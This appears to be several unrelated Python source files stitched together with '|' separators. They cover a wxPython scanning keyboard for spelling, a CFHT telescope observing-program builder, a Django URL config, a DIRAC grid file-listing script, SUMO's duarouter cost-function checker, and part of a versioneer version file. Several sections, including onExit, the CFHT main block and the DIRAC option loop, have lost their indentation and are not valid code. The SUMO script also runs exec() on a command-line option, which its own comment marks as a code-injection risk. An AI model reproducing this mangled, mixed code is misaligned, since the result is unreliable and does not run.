        for index_2, item in enumerate( self.labels[ 1 ][ -6 : ] ):
            b = bt.GenBitmapButton( self.parent, -1, bitmap = self.labelBitmaps2[ item ] )
            b.SetBackgroundColour( self.backgroundColour )
            b.SetBezelWidth( 3 )
            b.Bind( wx.EVT_LEFT_DOWN, self.onPress )
            if index_2==2:
                subSizer2.Add( b, ( ( index_1 + index_2 +1) / self.numberOfColumns[ 1 ], ( index_1 + index_2 +1) % self.numberOfColumns[ 1 ] ), (1,4), wx.EXPAND )
            elif index_2>2:
                subSizer2.Add( b, ( ( index_1 + index_2 +4) / self.numberOfColumns[ 1], ( index_1 + index_2+4 ) % self.numberOfColumns[ 1 ] ), wx.DefaultSpan, wx.EXPAND )
            else:
                subSizer2.Add( b, ( ( index_1 + index_2+1 ) / self.numberOfColumns[ 1 ], ( index_1 + index_2 +1) % self.numberOfColumns[ 1 ] ), wx.DefaultSpan, wx.EXPAND )
        self.subSizers.append( subSizer2 )
        self.parent.mainSizer.Add( self.subSizers[ 1 ], proportion = 1, flag = wx.EXPAND )
        self.parent.mainSizer.Show( item = self.subSizers[ 1 ], show = False, recursive = True )
        self.parent.SetSizer( self.parent.mainSizer )
        # self.ktore: indexes of all currently active keys (letters + icons)
        ikony=range(self.numberOfColumns[0]*self.numberOfRows[0]-8,self.numberOfColumns[0]*self.numberOfRows[0]-2)
        self.ktore=self.pomieszane
        for i in ikony:
            self.ktore.append(i)
        self.parent.Layout()
        self.usuniete=[]
def onExit(self):
self.parent.PicNr-=1
self.parent.stoper2.Stop( )
self.parent.back()
def czytajLitere(self,litera):
    """Play the recorded pronunciation of the letter *litera*.

    The sound is looked up by finding the first phone label containing
    the swap-cased letter, then playing the sound at the same index.

    NOTE(review): time.sleep(1) blocks the GUI thread for a full second
    before playback — presumably to let the key-click sound finish;
    confirm this is intentional.
    """
    time.sleep(1)
    # phoneLabels and sounds are parallel lists; index by matching label.
    soundIndex = self.phoneLabels.index( [ item for item in self.phoneLabels if litera.swapcase() in item ][ 0 ] )
    sound = self.sounds[ soundIndex ]
    sound.play( )
    self.parent.SetFocus()
#----------------------------------------------------------------------------
def onPress(self, event):
    """Switch-press handler: activate the key the scanner is currently on.

    Only the first press inside a timer tick is honoured —
    ``numberOfPresses`` is reset to 0 by ``timerUpdate`` — so extra
    presses fall through to ``event.Skip()``.

    NOTE(review): indentation of this method was reconstructed from a
    whitespace-mangled source; the branch structure below follows the
    apparent logic — confirm against the original file.
    """
    self.numberOfPresses += 1
    if self.numberOfPresses == 1:
        # kolejnyKrok has already advanced past the highlighted item, so
        # kolejnyKrok-1 is the key that was lit when the press happened.
        label = self.labels[ 0 ][self.ktore[self.kolejnyKrok-1]]
        item = self.subSizers[ 0 ].GetChildren()
        b = item[self.ktore[self.kolejnyKrok-1]]
        b=b.GetWindow( )
        if label != 'SPEAK':
            b.SetBackgroundColour( self.selectionColour )
        else:
            pass
        b.SetFocus( )
        b.Update( )
        if label in self.slowo:
            # A letter of the target word: type it and grey the key out.
            self.typewriterKeySound.play()
            self.textField.WriteText(label)
            item = self.subSizers[ 0 ].GetChildren()
            b = item[self.ktore[self.kolejnyKrok-1]]
            b=b.GetWindow( )
            b.SetBackgroundColour( 'grey' )
            b.SetForegroundColour('grey')
            b.SetFocus( )
            b.Update( )
            # Move the key from the scannable set (ktore) to the used list.
            self.usuniete.append(self.ktore[self.kolejnyKrok-1])
            self.ktore.remove( self.ktore[self.kolejnyKrok-1] )
            self.kolejnyKrok=0
        elif label == 'DELETE':
            # Undo the most recent letter: restore its key and remove the
            # character left of the insertion point.
            text=self.textField.GetValue()
            if text:
                self.typewriterForwardSound.play( )
                item = self.subSizers[ 0 ].GetChildren()
                b = item[self.usuniete[-1]]
                b=b.GetWindow( )
                b.SetBackgroundColour( self.backgroundColour)
                if self.labels[0][self.usuniete[-1]] in self.colouredLabels:
                    b.SetForegroundColour( self.vowelColour )
                else:
                    b.SetForegroundColour( self.textColour )
                b.SetFocus( )
                b.Update( )
                self.ktore.append(self.usuniete[-1])
                self.ktore.sort()
                self.usuniete.remove( self.usuniete[-1] )
                self.textField.Remove(self.textField.GetInsertionPoint()-1, self.textField.GetInsertionPoint())
                self.kolejnyKrok=0
            else:
                pass
        elif label == 'SPEAK':
            # Toggle letter read-out mode; the key stays red while active.
            if not self.voice:
                self.voice=True
                b.SetBackgroundColour('indian red')
                b.SetFocus( )
                b.Update()
            else:
                b.SetBackgroundColour(self.backgroundColour)
                b.SetFocus( )
                b.Update()
                self.voice=False
        elif label == 'ORISPEAK':
            # Spell the whole word aloud; generate the recording with sox
            # on first use, caching it under multimedia/spelling/.
            self.parent.stoper2.Stop()
            if str(self.parent.word)+'.ogg' not in os.listdir(self.pathToEPlatform+'multimedia/spelling/'):
                command='sox -m '+self.pathToEPlatform+'sounds/phone/'+list(self.parent.word)[0].swapcase()+'.wav'
                ile=0
                for l in list(self.parent.word)[1:]:
                    # each subsequent phone is padded 2 s later than the last
                    ile+=2
                    command+=' "|sox '+self.pathToEPlatform+'sounds/phone/'+l.swapcase()+'.wav'+' -p pad '+str(ile)+'"'
                command+=' '+self.pathToEPlatform+'multimedia/spelling/'+self.parent.word+'.ogg'
                wykonaj=sp.Popen(shlex.split(command))
                # NOTE(review): fixed sleep instead of waiting on the sox
                # process — may race on slow machines; confirm.
                time.sleep(1.5)
            do_literowania=mixer.Sound(self.pathToEPlatform+'multimedia/spelling/'+self.parent.word+'.ogg')
            do_literowania.play()
            self.parent.stoper4.Start((do_literowania.get_length()+0.5 )* 1000)
        elif label == 'TRASH':
            # Clear the whole typed word and restore every used key.
            text=self.textField.GetValue()
            if text:
                self.typewriterForwardSound.play()
                self.textField.Remove(0,self.textField.GetInsertionPoint())
                for litera in self.usuniete:
                    item = self.subSizers[ 0 ].GetChildren()
                    b = item[litera]
                    b=b.GetWindow( )
                    b.SetBackgroundColour( self.backgroundColour)
                    if self.labels[0][litera] in self.colouredLabels:
                        b.SetForegroundColour( self.vowelColour )
                    else:
                        b.SetForegroundColour( self.textColour )
                    b.SetFocus( )
                    b.Update( )
                while self.usuniete:
                    self.ktore.append(self.usuniete[-1])
                    self.ktore.sort()
                    self.usuniete.remove(self.usuniete[-1] )
                self.kolejnyKrok=0
            else:
                pass
        elif label == 'EXIT':
            self.onExit( )
        elif label =='CHECK':
            # Submit the typed word to the parent for verification.
            self.parent.stoper2.Stop()
            self.parent.ownWord=self.textField.GetValue()
            self.parent.check()
        else:
            pass
    else:
        event.Skip( )
#-------------------------------------------------------------------------
def timerUpdate(self, event):
    """Scanning-timer tick: advance the highlight to the next active key.

    Every tick repaints all still-active keys with the background colour
    (the SPEAK key stays 'indian red' while voice mode is on), then
    highlights the key at ``kolejnyKrok`` and finally advances or wraps
    the scan position.

    NOTE(review): indentation reconstructed from mangled source.
    """
    # park the pointer in the corner so stray mouse moves don't interfere
    self.mouseCursor.move( self.winWidth - 12, self.winHeight - 20 )
    self.numberOfPresses = 0
    for i in self.ktore:
        if self.voice and i == self.numberOfRows[0]*self.numberOfColumns[0]-4:
            # the SPEAK key keeps its "active" colour in voice mode
            items = self.subSizers[ 0 ].GetChildren()
            b = items[i]
            b=b.GetWindow( )
            b.SetBackgroundColour( 'indian red')
            b.SetFocus( )
            b.Update( )
        else:
            items = self.subSizers[ 0 ].GetChildren()
            b = items[i]
            b=b.GetWindow( )
            b.SetBackgroundColour( self.backgroundColour )
            b.SetFocus( )
            b.Update( )
    # highlight the current scan position
    if self.voice and self.ktore[self.kolejnyKrok] == self.numberOfRows[0]*self.numberOfColumns[0]-4:
        item = self.subSizers[ 0 ].GetChildren()
        b = item[self.ktore[self.kolejnyKrok]]
        b=b.GetWindow( )
        b.SetBackgroundColour( 'orange red')
        b.SetFocus( )
        b.Update( )
    else:
        item = self.subSizers[ 0 ].GetChildren()
        b = item[self.ktore[self.kolejnyKrok]]
        b=b.GetWindow( )
        b.SetBackgroundColour( self.scanningColour)
        b.SetFocus( )
        b.Update( )
    # in voice mode, read the highlighted letter aloud (pausing the scan)
    if self.voice and self.labels[0][self.ktore[self.kolejnyKrok]] in self.slowo:
        self.parent.stoper2.Stop()
        label = self.labels[ 0 ][self.ktore[self.kolejnyKrok]]
        self.czytajLitere(label)
        self.parent.stoper2.Start(self.timeGap)
    # advance the scan position, wrapping at the end of the active keys
    if self.kolejnyKrok == len(self.ktore)-1:
        self.kolejnyKrok=0
    else:
        self.kolejnyKrok+=1
|
import json
import argparse
import numpy
import sys
import copy
from astropy.coordinates import SkyCoord
from astropy import units
import operator
class Program(object):
    """Mutable container for a CFHT observing-program description.

    The description is a plain dict (``self.config``) ready for JSON
    serialisation; the ``add_*`` helpers append entries to the three
    lists under ``program_configuration``.
    """

    def __init__(self, runid="16BP06", pi_login="gladman"):
        configuration = {"mjdates": [],
                         "observing_blocks": [],
                         "observing_groups": []}
        self.config = {"runid": runid,
                       "pi_login": pi_login,
                       "program_configuration": configuration}

    def add_target(self, target):
        """Append a target (mjdate) definition dict."""
        self.config["program_configuration"]["mjdates"].append(target)

    def add_observing_block(self, observing_block):
        """Append an observing-block definition dict."""
        self.config["program_configuration"]["observing_blocks"].append(observing_block)

    def add_observing_group(self, observing_group):
        """Append an observing-group definition dict."""
        self.config["program_configuration"]["observing_groups"].append(observing_group)
class Target(object):
    """Read-only view over an mjdate JSON target description file."""

    def __init__(self, filename=None):
        # Fix: use a context manager so the file handle is closed promptly;
        # the original json.load(open(filename)) left it to the GC.
        with open(filename) as fobj:
            self.config = json.load(fobj)

    @property
    def token(self):
        """Client token identifying this target."""
        return self.config["identifier"]["client_token"]

    @property
    def mag(self):
        """Magnitude at the first ephemeris point."""
        return self.config["moving_target"]["ephemeris_points"][0]["mag"]

    @property
    def coordinate(self):
        """SkyCoord of the first ephemeris point (ra/dec in degrees)."""
        return SkyCoord(self.config["moving_target"]["ephemeris_points"][0]["coordinate"]["ra"],
                        self.config["moving_target"]["ephemeris_points"][0]["coordinate"]["dec"],
                        unit='degree')
class ObservingBlock(object):
    """One observing block: links a target to default constraint C1 and
    instrument configuration I1 (callers may overwrite the latter)."""

    def __init__(self, client_token, target_token):
        config = {}
        config["identifier"] = {"client_token": client_token}
        config["target_identifier"] = {"client_token": target_token}
        config["constraint_identifiers"] = [{"server_token": "C1"}]
        config["instrument_config_identifiers"] = [{"server_token": "I1"}]
        self.config = config

    @property
    def token(self):
        """Client token identifying this observing block."""
        return self.config["identifier"]["client_token"]
class ObservingGroup(object):
    """A named group of observing blocks, referenced by client token."""

    def __init__(self, client_token):
        self.config = {"identifier": {"client_token": client_token},
                       "observing_block_identifiers": []}

    def add_ob(self, client_token):
        """Add the observing block with *client_token* to this group."""
        entry = {"client_token": client_token}
        self.config["observing_block_identifiers"].append(entry)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('ogname')
parser.add_argument('mjdates', nargs='+')
args = parser.parse_args()
# Break the mjdates into OBs based on their max mag of source in pointing.
cuts = numpy.array([23.0, 23.5, 24.0, 24.5, 25.0, 25.5, 26.0, 30.0])
IC_exptimes = [50, 100, 200, 300, 400, 500, 600, 700]
program = Program()
ob_tokens = []
mags = {}
ob_coordinate = {}
for filename in args.mjdates:
target = Target(filename)
program.add_target(target.config)
ob_token = "OB-{}-{}".format(target.token, target.mag)
ob = ObservingBlock(ob_token, target.token)
idx = (target.mag > cuts).sum() + 4
ob.config["instrument_config_identifiers"] = [{"server_token": "I{}".format(idx)}]
program.add_observing_block(ob.config)
ob_tokens.append(ob_token)
mags[ob_token] = target.mag
ob_coordinate[ob_token] = target.coordinate
sf = lambda x, y: cmp(x.ra, y.ra)
order_tokens = sorted(ob_coordinate, cmp=sf, key=ob_coordinate.get)
total_itime = 0
ogs = {}
scheduled = {}
og_idx = 0
while len(scheduled) < len(ob_tokens):
og_idx += 1
og_token = "OG_{}_{}_{}".format(args.ogname, og_idx, 0)
sys.stdout.write("{}: ".format(og_token))
og = ObservingGroup(og_token)
og_coord = None
og_itime = 0
for ob_token in order_tokens:
if ob_token not in scheduled:
if og_coord is None:
og_coord = ob_coordinate[ob_token]
if ob_coordinate[ob_token].separation(og_coord) > 30 * units.degree:
continue
og.add_ob(ob_token)
scheduled[ob_token] = True
sys.stdout.write("{} ".format(ob_token))
sys.stdout.flush()
idx = (mags[ob_token] > cuts).sum()
print ob_token, mags[ob_token], idx + 4
og_itime += IC_exptimes[idx] + 40
if og_itime > 3000.0:
break
break
total_itime += og_itime
sys.stdout.write(" {}s \n".format(og_itime))
program.add_observing_group(og.config)
nrepeats = 0
for repeat in range(nrepeats):
total_itime += og_itime
og_token = "OG_{}_{}_{}".format(args.ogname, og_idx, repeat + 1)
og = copy.deepcopy(og)
og.config["identifier"]["client_token"] = og_token
program.add_observing_group(og.config)
print "Total I-Time: {} hrs".format(total_itime/3600.)
json.dump(program.config, open('program.json', 'w'), indent=4, sort_keys=True)
|
from django.conf.urls import url
from . import views
app_name = "perso"
urlpatterns = [
url(r'^$', views.main, name='main'),
url(r'^(?P<pageId>[0-9]+)/?$', views.main, name='main'),
url(r'^about/?$', views.about, name='about'),
url(r'^contact/?$', views.contact, name='contact'),
url(r'^(?P<cat_slug>[-a-zA-Z0-9_]+)/?$', views.main, name='main'),
url(r'^(?P<cat_slug>[-a-zA-Z0-9_]+)/(?P<pageId>[0-9]+)/?$', views.main, name='main'),
url(r'^publication/(?P<slug>[-a-zA-Z0-9_]+)/?$', views.publication, name='publication'),
url(r'^tag/(?P<slug>[-a-zA-Z0-9_]+)/?$', views.tag, name='tag'),
]
|
"""
Get the list of all the user files.
"""
__RCSID__ = "$Id$"
from DIRAC.Core.Base import Script
days = 0
months = 0
years = 0
wildcard = None
baseDir = ''
emptyDirsFlag = False
Script.registerSwitch( "D:", "Days=", "Match files older than number of days [%s]" % days )
Script.registerSwitch( "M:", "Months=", "Match files older than number of months [%s]" % months )
Script.registerSwitch( "Y:", "Years=", "Match files older than number of years [%s]" % years )
Script.registerSwitch( "w:", "Wildcard=", "Wildcard for matching filenames [All]" )
Script.registerSwitch( "b:", "BaseDir=", "Base directory to begin search (default /[vo]/user/[initial]/[username])" )
Script.registerSwitch( "e", "EmptyDirs", "Create a list of empty directories" )
Script.setUsageMessage( '\n'.join( [ __doc__.split( '\n' )[1],
'Usage:',
' %s [option|cfgfile] ...' % Script.scriptName, ] ) )
Script.parseCommandLine( ignoreErrors = False )
for switch in Script.getUnprocessedSwitches():
if switch[0] == "D" or switch[0].lower() == "days":
days = int( switch[1] )
if switch[0] == "M" or switch[0].lower() == "months":
months = int( switch[1] )
if switch[0] == "Y" or switch[0].lower() == "years":
years = int( switch[1] )
if switch[0].lower() == "w" or switch[0].lower() == "wildcard":
wildcard = switch[1]
if switch[0].lower() == "b" or switch[0].lower() == "basedir":
baseDir = switch[1]
if switch[0].lower() == "e" or switch[0].lower() == "emptydirs":
emptyDirsFlag = True
import DIRAC
from DIRAC import gLogger
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getVOForGroup
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
from DIRAC.Core.Utilities.List import sortList
from datetime import datetime, timedelta
import sys, os, time, fnmatch
fc = FileCatalog()
def isOlderThan( cTimeStruct, days ):
  """Return True when *cTimeStruct* lies more than *days* days in the past (UTC)."""
  cutoff = datetime.utcnow() - timedelta( days = days )
  return cTimeStruct < cutoff
# Metadata (creation dates) is only needed when an age filter was requested.
withMetadata = False
if days or months or years:
  withMetadata = True
# Collapse the age options into a single day count (months ~ 30 d, years ~ 365 d).
totalDays = 0
if years:
  totalDays += 365 * years
if months:
  totalDays += 30 * months
if days:
  totalDays += days
res = getProxyInfo( False, False )
if not res['OK']:
  gLogger.error( "Failed to get client proxy information.", res['Message'] )
  DIRAC.exit( 2 )
proxyInfo = res['Value']
username = proxyInfo['username']
vo = ''
if 'group' in proxyInfo:
  vo = getVOForGroup( proxyInfo['group'] )
# Default search root is the user's home area: /<vo>/user/<initial>/<username>.
if not baseDir:
  if not vo:
    gLogger.error( 'Could not determine VO' )
    Script.showHelp()
  baseDir = '/%s/user/%s/%s' % ( vo, username[0], username )
baseDir = baseDir.rstrip( '/' )
gLogger.info( 'Will search for files in %s' % baseDir )
# Iterative depth-first walk of the catalog using activeDirs as a stack.
activeDirs = [baseDir]
allFiles = []
emptyDirs = []
while len( activeDirs ) > 0:
  currentDir = activeDirs.pop()
  res = fc.listDirectory( currentDir, withMetadata, timeout = 360 )
  if not res['OK']:
    gLogger.error( "Error retrieving directory contents", "%s %s" % ( currentDir, res['Message'] ) )
  elif currentDir in res['Value']['Failed']:
    gLogger.error( "Error retrieving directory contents", "%s %s" % ( currentDir, res['Value']['Failed'][currentDir] ) )
  else:
    dirContents = res['Value']['Successful'][currentDir]
    subdirs = dirContents['SubDirs']
    files = dirContents['Files']
    if not subdirs and not files:
      emptyDirs.append( currentDir )
      gLogger.notice( '%s: empty directory' % currentDir )
    else:
      # Recurse only into directories old enough to possibly contain matches.
      for subdir in sorted( subdirs, reverse = True ):
        if ( not withMetadata ) or isOlderThan( subdirs[subdir]['CreationDate'], totalDays ):
          activeDirs.append( subdir )
      # Drop files failing the age or wildcard filter (sorted() copies the
      # keys, so popping while iterating is safe here).
      for filename in sorted( files ):
        fileOK = False
        if ( not withMetadata ) or isOlderThan( files[filename]['MetaData']['CreationDate'], totalDays ):
          if wildcard is None or fnmatch.fnmatch( filename, wildcard ):
            fileOK = True
        if not fileOK:
          files.pop( filename )
      allFiles += sorted( files )
      gLogger.notice( "%s: %d files%s, %d sub-directories" % ( currentDir, len( files ), ' matching' if withMetadata or wildcard else '', len( subdirs ) ) )
# Write the matched LFNs (and optionally the empty directories) to files
# named after the base directory with '/' turned into '-'.
outputFileName = '%s.lfns' % baseDir.replace( '/%s' % vo, '%s' % vo ).replace( '/', '-' )
outputFile = open( outputFileName, 'w' )
for lfn in sortList( allFiles ):
  outputFile.write( lfn + '\n' )
outputFile.close()
gLogger.notice( '%d matched files have been put in %s' % ( len( allFiles ), outputFileName ) )
if emptyDirsFlag:
  outputFileName = '%s.emptydirs' % baseDir.replace( '/%s' % vo, '%s' % vo ).replace( '/', '-' )
  outputFile = open( outputFileName, 'w' )
  for dir in sortList( emptyDirs ):
    outputFile.write( dir + '\n' )
  outputFile.close()
  gLogger.notice( '%d empty directories have been put in %s' % ( len( emptyDirs ), outputFileName ) )
DIRAC.exit( 0 )
|
"""
@file costFunctionChecker.py
@author Michael Behrisch
@author Daniel Krajzewicz
@author Jakob Erdmann
@date 2009-08-31
@version $Id: costFunctionChecker.py 13811 2013-05-01 20:31:43Z behrisch $
Run duarouter repeatedly and simulate weight changes via a cost function.
SUMO, Simulation of Urban MObility; see http://sumo.sourceforge.net/
Copyright (C) 2009-2013 DLR (http://www.dlr.de/) and contributors
All rights reserved
"""
import os, sys, subprocess, types
from datetime import datetime
from optparse import OptionParser
from xml.sax import make_parser, handler
def call(command, log):
    """Run *command*, teeing its stdout/stderr to *log*; exit on failure.

    command -- a string or a sequence of arguments (non-strings coerced).
    log     -- an open file object; also named in the error message.
    """
    # Fix: the guard previously tested the undefined name 'args', which
    # raised NameError on every call; it must inspect 'command'.
    if not isinstance(command, types.StringTypes):
        command = [str(c) for c in command]
    print >> log, "-" * 79
    print >> log, command
    log.flush()
    retCode = subprocess.call(command, stdout=log, stderr=log)
    if retCode != 0:
        print >> sys.stderr, "Execution of %s failed. Look into %s for details." % (command, log.name)
        sys.exit(retCode)
def writeRouteConf(step, options, file, output):
    """Write iteration_<step>.duarcfg, the duarouter configuration for *step*.

    Step 0 reads raw trips/flows from *file*; later steps read the previous
    step's route alternatives plus the weight dump produced for step-1.
    *output* names the route file duarouter should produce.
    """
    fd = open("iteration_" + str(step) + ".duarcfg", "w")
    print >> fd, """<configuration>
<input>
<net-file value="%s"/>""" % options.net
    if step==0:
        if options.flows:
            print >> fd, ' <flow-definition value="%s"/>' % file
        else:
            print >> fd, ' <trip-defs value="%s"/>' % file
    else:
        # reuse last iteration's alternatives and the synthetic weight dump
        print >> fd, ' <alternatives value="%s"/>' % file
        print >> fd, ' <weights value="dump_%s_%s.xml"/>' % (step-1, options.aggregation)
    print >> fd, """ </input>
<output>
<output-file value="%s"/>
<exit-times value="True"/>
</output>""" % output
    print >> fd, """ <processing>
<continue-on-unbuild value="%s"/>
<expand-weights value="True"/>
<gBeta value="%s"/>
<gA value="%s"/>
</processing>""" % (options.continueOnUnbuild, options.gBeta, options.gA)
    print >> fd, ' <random_number><abs-rand value="%s"/></random_number>' % options.absrand
    # trailing commas keep begin/end on one <time> line
    print >> fd, ' <time><begin value="%s"/>' % options.begin,
    if options.end:
        print >> fd, '<end value="%s"/>' % options.end,
    print >> fd, """</time>
<report>
<verbose value="%s"/>
<suppress-warnings value="%s"/>
</report>
</configuration>""" % (options.verbose, options.noWarnings)
    fd.close()
class RouteReader(handler.ContentHandler):
    """SAX handler that tallies how often each edge occurs in the parsed
    routes and records the latest vehicle departure time seen."""

    def __init__(self):
        self._edgeWeights = {}
        self._maxDepart = 0

    def startElement(self, name, attrs):
        if name == 'route':
            # count every occurrence of each edge over all routes
            for edge in attrs['edges'].split():
                self._edgeWeights[edge] = self._edgeWeights.get(edge, 0) + 1
        elif name == 'vehicle':
            depart = float(attrs['depart'])
            self._maxDepart = max(self._maxDepart, depart)

    def getWeight(self, edge):
        """Number of routes that use *edge* (0 if never seen)."""
        return self._edgeWeights.get(edge, 0)

    def getMaxDepart(self):
        """Latest departure time encountered so far."""
        return self._maxDepart
class NetReader(handler.ContentHandler):
    """SAX handler collecting the ids of all plain ('normal') edges of a
    SUMO network, skipping internal/special-function edges."""

    def __init__(self):
        self._edges = []

    def startElement(self, name, attrs):
        if name == 'edge':
            # Fix: 'in' replaces dict.has_key(), which is deprecated in
            # Python 2 and removed in Python 3; behavior is unchanged.
            if 'function' not in attrs or attrs['function'] == 'normal':
                self._edges.append(attrs['id'])

    def getEdges(self):
        """Return the collected edge ids in document order."""
        return self._edges
def identity(edge, weight):
    """Default cost function: the travel time is the raw weight, unchanged."""
    return weight
def generateWeights(step, options, edges, weights, costFunction):
    """Write dump_<step>_<aggregation>.xml with costFunction-derived travel
    times for every edge, one <interval> per aggregation period.

    weights      -- a RouteReader supplying per-edge counts and max depart.
    costFunction -- maps (edge, weight) to a travel time, or None to skip.
    """
    fd = open("dump_%s_%s.xml" % (step, options.aggregation), "w")
    print >> fd, '<?xml version="1.0"?>\n<netstats>'
    # Fix: the loop previously read the module-level 'reader' instead of the
    # 'weights' parameter, silently ignoring the object passed by the caller.
    # The loop variable was also renamed so it no longer shadows the 'time'
    # module.
    for begin in range(0, int(weights.getMaxDepart()+1), options.aggregation):
        print >> fd, ' <interval begin="%s" end="%s" id="dump_%s">' % (begin, begin + options.aggregation, options.aggregation)
        for edge in edges:
            cost = costFunction(edge, weights.getWeight(edge))
            if cost != None:
                print >> fd, ' <edge id="%s" traveltime="%s"/>' % (edge, cost)
        print >> fd, ' </interval>'
    print >> fd, '</netstats>'
    fd.close()
# Command-line interface; mirrors dua-iterate's options so this checker can
# be dropped into the same tool chain.
optParser = OptionParser()
optParser.add_option("-v", "--verbose", action="store_true", dest="verbose",
                     default=False, help="tell me what you are doing")
optParser.add_option("-C", "--continue-on-unbuild", action="store_true", dest="continueOnUnbuild",
                     default=False, help="continues on unbuild routes")
optParser.add_option("-w", "--disable-warnings", action="store_true", dest="noWarnings",
                     default=False, help="disables warnings")
optParser.add_option("-n", "--net-file", dest="net",
                     help="SUMO network (mandatory)", metavar="FILE")
optParser.add_option("-t", "--trips", dest="trips",
                     help="trips in step 0 (this or flows is mandatory)", metavar="FILE")
optParser.add_option("-F", "--flows",
                     help="flows in step 0 (this or trips is mandatory)", metavar="FILE")
optParser.add_option("-+", "--additional", dest="additional",
                     default="", help="Additional files")
optParser.add_option("-b", "--begin", dest="begin",
                     type="int", default=0, help="Set simulation/routing begin [default: %default]")
optParser.add_option("-e", "--end", dest="end",
                     type="int", help="Set simulation/routing end [default: %default]")
optParser.add_option("-R", "--route-steps", dest="routeSteps",
                     type="int", default=200, help="Set simulation route steps [default: %default]")
optParser.add_option("-a", "--aggregation", dest="aggregation",
                     type="int", default=900, help="Set main weights aggregation period [default: %default]")
optParser.add_option("-A", "--gA", dest="gA",
                     type="float", default=.5, help="Sets Gawron's Alpha [default: %default]")
optParser.add_option("-B", "--gBeta", dest="gBeta",
                     type="float", default=.9, help="Sets Gawron's Beta [default: %default]")
optParser.add_option("-f", "--first-step", dest="firstStep",
                     type="int", default=0, help="First DUA step [default: %default]")
optParser.add_option("-l", "--last-step", dest="lastStep",
                     type="int", default=50, help="Last DUA step [default: %default]")
optParser.add_option("-p", "--path", dest="path",
                     default=os.environ.get("SUMO_BINDIR", ""), help="Path to binaries [default: %default]")
optParser.add_option("-y", "--absrand", dest="absrand", action="store_true",
                     default=False, help="use current time to generate random number")
optParser.add_option("-c", "--cost-function", dest="costfunc",
                     default="identity", help="(python) function to use as cost function")
(options, args) = optParser.parse_args()
# Validate mandatory inputs and resolve the duarouter binary.
if not options.net or not (options.trips or options.flows):
    optParser.error("At least --net-file and --trips or --flows have to be given!")
duaBinary = os.environ.get("DUAROUTER_BINARY", os.path.join(options.path, "duarouter"))
log = open("dua-log.txt", "w+")
# Parse the network once to collect the list of normal edges.
parser = make_parser()
reader = NetReader()
parser.setContentHandler(reader)
parser.parse(options.net)
edges = reader.getEdges()
# Resolve the cost function: either "module.func" (imported) or the name of
# a function defined in this file.
# SECURITY NOTE: exec on a command-line argument executes arbitrary code;
# only run this script with trusted --cost-function values.
if "." in options.costfunc:
    idx = options.costfunc.rfind(".")
    module = options.costfunc[:idx]
    func = options.costfunc[idx+1:]
    exec("from %s import %s as costFunction" % (module, func))
else:
    exec("costFunction = %s" % options.costfunc)
if options.flows:
    tripFiles = options.flows.split(",")
else:
    tripFiles = options.trips.split(",")
starttime = datetime.now()
# Main DUA loop: route with duarouter, then regenerate the weight dump from
# the produced routes via the configured cost function.
for step in range(options.firstStep, options.lastStep):
    btimeA = datetime.now()
    print "> Executing step " + str(step)
    # router
    files = []
    for tripFile in tripFiles:
        file = tripFile
        tripFile = os.path.basename(tripFile)
        # after step 0, feed the previous step's alternatives back in
        if step>0:
            file = tripFile[:tripFile.find(".")] + "_%s.rou.alt.xml" % (step-1)
        output = tripFile[:tripFile.find(".")] + "_%s.rou.xml" % step
        print ">> Running router with " + file
        btime = datetime.now()
        print ">>> Begin time: %s" % btime
        writeRouteConf(step, options, file, output)
        retCode = call([duaBinary, "-c", "iteration_%s.duarcfg" % step], log)
        etime = datetime.now()
        print ">>> End time: %s" % etime
        print ">>> Duration: %s" % (etime-btime)
        print "<<"
        files.append(output)
    # generating weights file
    print ">> Generating weights"
    # reuse the SAX parser with a fresh RouteReader over all route files
    reader = RouteReader()
    parser.setContentHandler(reader)
    for f in files:
        parser.parse(f)
    generateWeights(step, options, edges, reader, costFunction)
    print "<<"
    print "< Step %s ended (duration: %s)" % (step, datetime.now() - btimeA)
    print "------------------\n"
    sys.stdout.flush()
print "dua-iterate ended (duration: %s)" % (datetime.now() - starttime)
log.close()
|
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
    """Get the keywords needed to look up the version information."""
    # These placeholders are substituted by git during git-archive.
    # setup.py/versioneer.py greps for the variable names, so each
    # assignment must stay on its own line exactly as written.
    git_refnames = "$Format:%d$"
    git_full = "$Format:%H$"
    git_date = "$Format:%ci$"
    return {"refnames": git_refnames,
            "full": git_full,
            "date": git_date}
class VersioneerConfig:
    """Container for Versioneer configuration parameters.

    A plain attribute bag; get_config() fills in VCS, style, tag_prefix,
    parentdir_prefix, versionfile_source and verbose.
    """
def get_config():
    """Create, populate and return the VersioneerConfig() object."""
    # these values are filled in when 'setup.py versioneer' creates
    # _version.py
    cfg = VersioneerConfig()
    settings = (("VCS", "git"),
                ("style", ""),
                ("tag_prefix", ""),
                ("parentdir_prefix", "None"),
                ("versionfile_source", "datapoint/_version.py"),
                ("verbose", False))
    for attribute, value in settings:
        setattr(cfg, attribute, value)
    return cfg
class NotThisMethod(Exception):
    """Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}


def register_vcs_handler(vcs, method):  # decorator
    """Decorator factory: register the wrapped function as the *method*
    handler for *vcs* in the module-level HANDLERS registry."""
    def decorate(f):
        """Store f in HANDLERS[vcs][method] and return it unchanged."""
        HANDLERS.setdefault(vcs, {})[method] = f
        return f
    return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
                env=None):
    """Try each candidate in *commands* with *args* until one launches.

    Returns (stdout, returncode); (None, None) when nothing could be run,
    (None, returncode) when the process exited non-zero.
    """
    assert isinstance(commands, list)
    process = None
    for candidate in commands:
        dispcmd = str([candidate] + args)
        try:
            # remember shell=False, so use git.cmd on windows, not just git
            process = subprocess.Popen([candidate] + args, cwd=cwd, env=env,
                                       stdout=subprocess.PIPE,
                                       stderr=(subprocess.PIPE if hide_stderr
                                               else None))
        except EnvironmentError:
            err = sys.exc_info()[1]
            if err.errno == errno.ENOENT:
                # candidate not installed; try the next one
                continue
            if verbose:
                print("unable to run %s" % dispcmd)
                print(err)
            return None, None
        break
    else:
        if verbose:
            print("unable to find command, tried %s" % (commands,))
        return None, None
    output = process.communicate()[0].strip()
    if sys.version_info[0] >= 3:
        output = output.decode()
    if process.returncode != 0:
        if verbose:
            print("unable to run %s (error)" % dispcmd)
            print("stdout was %s" % output)
        return None, process.returncode
    return output, process.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
    """Try to determine the version from the parent directory name.

    Source tarballs conventionally unpack into a directory that includes both
